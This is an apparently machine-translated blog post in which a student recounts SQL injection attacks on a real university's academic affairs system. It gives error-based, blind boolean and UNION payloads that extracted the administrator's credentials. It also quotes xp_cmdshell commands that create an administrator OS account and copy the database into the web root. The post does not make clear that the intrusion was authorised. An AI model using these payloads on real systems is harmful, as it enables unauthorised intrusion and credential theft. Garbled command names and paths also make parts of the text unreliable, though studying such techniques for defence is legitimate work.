Some Thoughts and conclusions on SQL Injection

After the test, I can continue my penetration journey. Last night, Lucas sorted out the documents of the information security competition in Chengdu this summer. It seems that this is the first time that the competition was held overnight since the first day of the freshman year. The ISCC competition ended on the 10th. It should be okay to go to the Beijing Green League finals during the summer vacation. So during this time, I made a lot of exercises for WEB penetration and Buffer OverFlow, mainly for SQL injection. The whole process is really too painful. I feel that SQL injection is not a simple task. During this period of time, various tangle occurs. Suddenly, I feel that SQL injection is so complicated because of too many changes, for different databases, different development languages, different encoding styles, and even a WAF filter, there will be different penetration solutions, just as Sun Tzu wrote: Know Yourself And know yourself, and so on. During this period, Mr. Guo and Mr. Guo have been conducting penetration tests in the academic affairs office. Here we will summarize the study and penetration during this period, including the penetration experience of jiangda educational administration system and Zhengfang system, there are also good posts from various blogs and forums, hoping to be helpful to others. Good! Let's talk about SQL injection.1. ClickI chose the educational administration system. http://jw . ******. Com/index. asp: Before starting SQL injection, I first step on this step. There are several goals in this step: 1) Determine whether the target host has the SQL injection vulnerability and find the SQL Injection Location. Generally, SQL Injection generally exists in the form: http://jw . ***** .Edu.cn/NewsInfo.asp? In ASP dynamic web pages with parameters such as id = 1429, sometimes a dynamic web page may have only one parameter, sometimes there may be N parameters, sometimes Integer Parameters, or sometimes string parameters. After finding possible injection points, we need to start some testing. My understanding of this technology is essentially using the Error Reporting Mechanism of ASP, PHP, and other programs, that is, manually construct an input to cause errors to the original normal Program Stream. If the coder does not do defensive programming such as try catch when writing code, this may lead to the display of error information, which exposes some database information. This is abstract. Let's take a typical SQL statement for example. Select * from admin where id = 1234 ($ id); if we add a single quotation mark when entering http://jw . ********. Com/NewsInfo. asp? Id = 1429 'causes the select * from admin where id = 1234' to run abnormally. From the results of the error, we can see that the Access database is used by the Academic Affairs Office Server (this is a bit painful. It seems that some pages of the Academic Affairs Office are not included in the WAF defense system, which is somewhat strange) to further confirm the authenticity of the injection point, you can construct the following input: http://jw . ***. Com/NewsInfo. asp? Id = 1429 and 1 = 1 http://jw . ***. Com/NewsInfo. asp? Id = 1429 and 1 = 2 after the above step, now we can basically confirm the existence of the SQL injection point. (2) The distinction between database server types is also very important, because SQL injection is a technology tailored to local conditions as mentioned at the beginning of the article. The input statements must be constructed based on different databases and different development languages in order to carry out targeted injection and penetration. Here, the situation is better, when we step on the first step, we find that the database type is Access. If the information cannot be obtained in the first step, we also have a method. The following is a technical blog post from ISCC. In general, ACCESS and SQL-SERVER are the most common database servers, although they all support the T-SQL standard, but there are differences, and different databases have different attack methods, must be treated differently. 1. using the database server's system variables to distinguish between SQL-SERVER user, db_name () and other system variables, using these system values can not only judge the SQL-SERVER, but also can get a lot of useful information. For example, ① HTTP: // xxx. xxx. xxx/abc. asp? P = YY and user> 0 not only can judge whether it is a SQL-SERVER, but also can get the user name currently connected to the database ② HTTP: // xxx. xxx. xxx/abc. asp? P = YY & n... db_name ()> 0 not only can judge whether it is a SQL-SERVER, but also can get the name of the database currently in use; 2, using the system Table ACCESS System table is msysobjects, and in the WEB environment does not have access permissions, and the SQL-SERVER system table is sysobjects, in the WEB environment has access permissions. For the following two statements: ① HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select count (*) from sysobjects)> 0 ② HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select count (*) from msysobjects)> 0 if the database is a SQL-SERVE, then the first, abc. asp must be running normally, and the second line is abnormal; if it is ACCESS, both lines will be abnormal. Good! Here, I have to repeat the topic of this article: the essence of SQL injection is to adapt to local conditions and analyze the specific situation in different environments, the two principles of Database Error Reporting (if any) should also be kept in mind. Let's go back to our case: educational administration system. In the early stage, we used nmap scanning to find an old background logon interface of the educational administration. This interface does not seem to have been used for input filtering or WAF defense: first, my thinking direction is that this SQL injection should be POST injection, because it is form login. Our goal is to get the database version and other information through POST injection. If you change the user name input: admin 'or '1' = '1, the pop-up message is a Password error. If you directly enter an account random, the pop-up account does not exist. It indicates that the login page does not filter the input. To speed up manual injection, here I use the java program WebScarab to manually construct POST data packets. Perform URL encoding admin' or (select count (*) from sysobjects)> 0 admin % 27 + or + % 28 select + count % 28 * % 29 + from + sysobjects % 29% 3E0% 3B -- the expected result is returned for the binary logic, that is, the password is incorrect, it indicates that the account is correct (this logic must be clarified) and it is confirmed that it is an sqlserver database.

Note that the URL encoding is missing at the beginning and the result is always incorrect. Remember the URL encoding When manually constructing a data packet. 2. Construct an SQL statement to expose the data table and record. Next, we need to know the data table and other information. Admin 'or user> 0; -- admin % 27 + or + user % 3E0% 3B -- not only can judge whether it is a SQL-SERVER, you can also get the username that is currently connected to the database. The username of the current database is displayed (the username used to log on to the database): jw uses the error logic described earlier, our command is to let the database determine the size of user and 0, but the user is string, and the 0 is int. Forced type conversion will cause errors, and all will indirectly get the results we want. This is the clever use of the Error Reporting mechanism. The following ideas are similar. Admin 'or db_name ()> 0; -- admin % 27 + or + db_name % 28% 29% 3E0% 3B -- not only can judge whether it is a SQL-SERVER, you can also obtain the name of the currently used database. The name of the current database (corresponding to the name of the database for this Service): jxgl starts to crack the table name: admin' or (select count (*) from users)> 0; -- admin % 27 + or + % 28 select + count % 28 * % 29 + from + user % 29% 3E0% 3B -- the expected result is returned, the table name may be: users, where the field name starts to be cracked: admin' or (select count (xh) from users)> 0; -- admin % 27 + or + % 28 select + count % 28 xsxh % 29 + from + users % 29% 3E0% 3B -- field: the value recorded on the first day of the xhkl brute-force cracking table (because this is probably the Administrator's account ). No.) admin' or (select top 1 len (xh) from users)> 0; -- admin % 27 + or + % 28 select + top + 1 + len % 28xh % 29 + from + users % 29% 3E0% 3B -- one trial from 0 to 10 at 3 stuck, the length of all xh is: 3 digits get stuck at 7, and the length of all xh is: 7 digits continue admin' or (select top 1 ASCII (SUBSTRING (xh, 1, 1 )) from users)> 0; -- admin % 27 + or + % 28 select + top + 1 + ASCII + % 28 SUBSTRING % 28xh % 2C1% 2C1% 29% 29 + from + users % 29% 3E0% 3B -- xh: wjjkl: ******** (it is a 7-digit number, which cannot be disclosed here. If you are interested, you can manually or use sqlmap to pop it out.) Here, the SQL injection base for this page This is a success, that is, the managed account and password. However, this page seems to be an old page and is no longer needed. Therefore, this account cannot be logged into the real background. After logging in, a new interface is displayed, this is the real background .............. at that time, I thought it was successful. Khan and Bai was happy. Later, Guo discovered that some pages at the front-end of the Academic Affairs Office were improperly filtered. You can use the UNION Idea for SQL injection. After the input, add union + (select + 1, 2, 4, 4, 5, 6 + from + admin) can obtain the managed account and password. This made me feel very wide open, and I have forgotten the joint query trick. I understand the UNNION query as follows: When you enter union + (select + 1, id, 3, password, username, 6 + from + admin, it is found that different words appear in other fields on the page. The principle is as follows. union requires the same number of fields for joint query, then it will overwrite the original specified region. So the key here is to try out the field names in the table based on the changes in the returned results, and the columns in the two data tables or queries selected in the joint query must match. In the union query, the number of union fields must be the same as the original one. That is to say, we can try out the table name based on the binary logic (or the Error Reporting Mechanism, number of fields, field name information, because only when these items are correct, the page can be displayed normally, there will be a value in the relevant area. By constructing a correct union query statement, the Administrator's account and password are obtained successfully. Login successful! 3. SQL privilege escalation is difficult to implement, because after my experiment, the cmd execution permission is disabled by default during installation of database software in major departments. The following is a post on ZDNet: if the account currently connected to the data has the SA permission and the master. dbo. xp_mongoshell extends the stored procedure (the shell of the operating system can be directly used when this stored procedure is called), and the entire computer can be fully controlled using the following methods, all subsequent steps can save 1, HTTP: // xxx. xxx. xxx/abc. asp? P = YY & nb... er> 0 abc. asp: Execution exception. However, you can obtain the username of the currently connected database (if dbo is displayed, it indicates SA ). 2. HTTP: // xxx. xxx. xxx/abc. asp? P = YY... me ()> 0 abc. asp execution exception, but the name of the database currently connected can be obtained. 3. HTTP: // xxx. xxx. xxx/abc. asp? P = YY; exec master .. xp_cmdshell "net user aaa bbb/add" -- (the master is the primary database of the SQL-SERVER; the semicolon in the name indicates that the SQL-SERVER executes the statement name before the semicolon and continues executing the statement after it; "-" indicates that all the content after it is only annotated and the system does not execute it. You can directly add the operating system account aaa with the password bbb. 4. HTTP: // xxx. xxx. xxx/abc. asp? P = YY; exec master .. xp_mongoshell "net localgroup administrators aaa/add" -- add the newly added account aaa to the administrators group. 5. HTTP: // xxx. xxx. xxx/abc. asp? P = YY; backuup database name to disk = 'C: inetpubwwwrootsave. db' backs up all the data to the WEB directory and downloads the file over HTTP (of course, the WEB virtual directory is preferred ). 6. Copy CMD to create the UNICODE vulnerability HTTP: // xxx. xxx. xxx/abc. asp? P = YY; exe... dbo. xp_mongoshell "copy c: winntsystem320000.exe c: inetpubscriptscmd.exe" creates a UNICODE vulnerability, this completes the control of the entire computer (of course, the first choice is to know the WEB virtual directory ). The above is the process of penetrating the Academic Affairs Office. I feel that SQL injection is really a university question. There is too little experience in this field. to really master the essence of SQL injection, we still need to study and summarize it. The Study of SQL injection has been put aside for the moment, and I have to finish the 0-day study. It is estimated that the finals will use a lot of knowledge in that book. I wanted to continue to write some insights that penetrate the school's performance system and WAF, but there are too many things, so let's study them separately, write an article about SQL Injection for WAF bypass later. I hope that I can read a few articles from the great god of Yi Ling, and I will make a summary of several foreign articles that wrap WAF. Finally, I hope that this summer's ISCC green alliance will be able to make full use of it and learn more from those great gods.